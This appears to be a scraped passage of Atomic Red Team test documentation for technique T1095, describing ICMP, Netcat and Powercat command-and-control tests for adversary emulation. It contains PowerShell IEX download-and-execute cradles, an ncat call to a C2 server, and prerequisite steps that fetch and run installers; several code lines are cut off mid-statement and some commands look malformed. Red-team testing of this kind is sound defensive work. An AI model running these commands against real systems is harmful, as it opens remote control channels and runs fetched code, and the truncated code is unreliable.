







- >  T1037.001
- >  T1037.002
- >  T1037.004
- >  T1037.005
- >  T1039
- >  T1040

```
IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md')
Invoke-PowerShellIcmp -IPAddress #{server_ip}
```

Atomic Test #2 - Netcat C2

Start C2 Session Using Ncat To start the listener on a Linux device, type the following: nc -l -p

Supported Platforms: Windows

auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37

Inputs:

Name	Description	Type	Default Value
server_port	The port for the C2 connection	Integer	80
ncat_exe	The location of ncat.exe	Path	\$env:TEMP\T1095\nmap-7.80\ncat.exe
ncat_path	The folder path of ncat.exe	Path	\$env:TEMP\T1095
server_ip	The IP address or domain name of the listening server	String	127.0.0.1

Attack Commands: Run with powershell!

```
cmd /c #{ncat_exe} #{server_ip} #{server_port}
```

Dependencies: Run with powershell!

Description: ncat.exe must be available at specified location (#{ncat_exe})

Check Prereq Commands:

```
if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
```

Get Prereq Commands:

```
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]
New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null
$parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parent
Invoke-WebRequest "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile
Expand-Archive $zippath $parentpath -Force
$unzipPath = Join-Path $parentPath "nmap-7.80"
if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\Current'
Start-Process (Join-Path $unzipPath "vcredist_x86.exe")
}
```

Atomic Test #3 - Powercat C2

Start C2 Session Using Powercat To start the listener on a Linux device, type the following: nc -l -p

Supported Platforms: Windows

auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e

Inputs:

Name	Description	Type	Default Value
server_ip	The IP address or domain name of the listening server	String	127.0.0.1
server_port	The port for the C2 connection	Integer	80

Attack Commands: Run with powershell !

```
IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/main/atomics/T1095/T1095.ps1')
powershell -c #{"server_ip"} -p #{"server_port"}
```